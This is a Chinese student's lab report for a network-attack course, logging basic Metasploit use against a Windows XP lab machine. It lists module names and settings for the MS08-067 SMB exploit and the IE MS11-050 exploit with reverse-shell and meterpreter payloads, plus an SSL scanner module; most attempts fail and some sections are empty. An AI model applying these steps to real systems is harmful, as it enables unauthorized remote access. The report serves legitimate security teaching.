20145338 《网络对抗》 MSF基础应用

20145338《网络对抗》 MSF基础应用

实验内容

·掌握metasploit的基本应用方式，掌握常用的三种攻击方式的思路。
具体需要完成（1）一个主动攻击;(2)一个针对浏览器的攻击；（3）一个针对客户端的攻击；（4）成功应用任何一个辅助模块。

基础问题回答

·exploit:通过漏洞对程序攻击的途径，是一种手段或通道。
·payload：具体的攻击代码
·encode：伪装、隐藏 达到免杀目的。

实践过程

##MS08_067安全漏洞渗透攻击实践

实验前先查看kali与靶机是否可以ping通

靶机为我这次新拷的WinXPenSP3
(将Kali与靶机网络调制NAT模式，否则ping不通啊)

1 ·输入msfconsole进入msf

2 ·进入该漏洞模块的使用（use exploit/windows/smb/ms08_067_netapi）
3 ·输入命令show payload会显示出有效的攻击载荷，

4 ·show targets会显示出可以被攻击的靶机的操作系统型号

5 ·设置攻击有效载荷（set payload generic/shell_reverse_tcp）

6 ·输入show options显示我们需要在攻击前需要设置的数据，将靶机IP（RHOST）与kali IP（LHOST）进行设置

7 ·输入exploit开始攻击

攻击失败。。。。未完待续。。

呀 ping都没ping通 不失败才怪哦 。。。
继续。。。

IE浏览器渗透攻击——MS11050安全漏洞

·在kali终端开启msfconsole，利用search命令搜索。

输入命令use exploit/windows/browser/ms11_050_mshtml_cobjetelement，进入该漏洞模块。使用info命令查看模块信息 。

设置对应的载荷set payload windows/meterpreter/reverese_tcp；show options查看需要设置的相关信息：

查看配置渗透攻击所需的配置选项

配置相关信息：set LHOST； ‘kali Ip’；； set LPORT 5338； set URIPATH ，


启动exploit 生成攻击


攻击失败.

Adobe阅读器渗透攻击

辅助模块

我选择auxiliary/scanner/ssl/openssl_ccs.rb
·在auxiliary中选择scanner中的ssl其中一个模块ccs.rb

·通过info查看需要配置的东西


·开始扫描

实验体会

比起做不出实验更让人难受的是电脑卡的要死 有时候lali还罢工 直接就打不开了,状况百出。大家看到的是什么时候交的博客 并不知道在底下配置电脑花了多久。。
不过也还好 已经完成一个。